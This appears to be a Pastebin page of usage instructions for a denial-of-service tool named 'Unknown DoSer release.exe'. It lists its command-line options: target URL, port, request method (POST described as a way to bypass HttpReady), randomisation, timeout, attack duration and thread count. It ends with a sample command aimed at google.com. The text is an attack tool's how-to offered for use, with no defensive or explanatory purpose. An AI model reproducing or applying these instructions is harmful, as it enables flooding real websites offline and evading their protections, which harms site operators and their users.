Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- You can launch an attack simply by running the program & by setting the options or from a batch file:
- "Unknown DoSer release.exe" URL PORT METHOD RANDOMIZE_REQUEST TIMEOUT DURATION MAX_THREADS
- URL [default:]: string, website's URL (e.g.: google.com)
- PORT [default:80]: int, website's port (e.g.: 80)
- METHOD [default:GET]: string, GET or POST (POST to bypass HttpReady) (e.g.: GET)
- RANDOMIZE_REQUEST [default:N]: string, randomize request, Y for Yes or N for No (e.g.: N)
- TIMEOUT [default:5]: int, send timeout in seconds (e.g.: 5)
- DURATION [default:120]: int, attack duration in seconds (e.g.: 120)
- MAX_THREADS [default:250]: int, number of threads (e.g.: 250)
- "Unknown DoSer release.exe" google.com 80 GET N 5 120 250
Advertisement
Add Comment
Please, Sign In to add comment